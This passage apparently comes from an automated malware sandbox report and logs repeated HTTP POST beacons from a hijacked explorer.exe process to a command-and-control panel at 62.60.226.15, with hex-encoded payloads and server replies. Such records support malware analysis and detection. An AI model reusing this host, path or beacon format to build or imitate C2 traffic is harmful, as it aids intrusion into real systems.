                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:32.799202919 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:32 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                36192.168.2.104976062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:34.547209024 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:35.816580057 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:35 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.104976162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:37.454210997 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:38.749696970 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.104976262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:40.577435017 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:41.844940901 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.104976362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:43.470067024 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:44.747591019 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:44 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.104976462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:46.500639915 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:47.798458099 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.104976562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:49.422514915 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:50.703238964 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.104976662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:52.453998089 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:53.721385956 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.104976762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:55.363886118 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:56.644545078 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.104976862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:28:58.392465115 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:59.674299002 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.104976962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:01.317910910 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:02.593630075 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.2.104977062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:04.346657991 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:05.614727974 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.2.104977162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:07.376087904 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:08.634172916 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.104977262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:10.375614882 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:11.643517971 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.104977362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:13.282543898 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:14.553715944 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.104977462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:16.298041105 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:17.565325975 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.104977562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:19.204518080 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:20.475075006 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.104977662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:22.220531940 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:23.497365952 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                53192.168.2.104977762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:25.128011942 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:26.426583052 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                54192.168.2.104977862.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:28.180047989 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:29.457067013 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                55192.168.2.104977962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:31.095058918 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:32.365231991 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:32 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                56192.168.2.104978062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:34.111773968 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:29:35.385090113 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:35 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                57192.168.2.104978162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:29:37.018239021 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:29:38.291567087 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:29:38 GMT
                                                Content-Type: text/html; charset=UTF-8
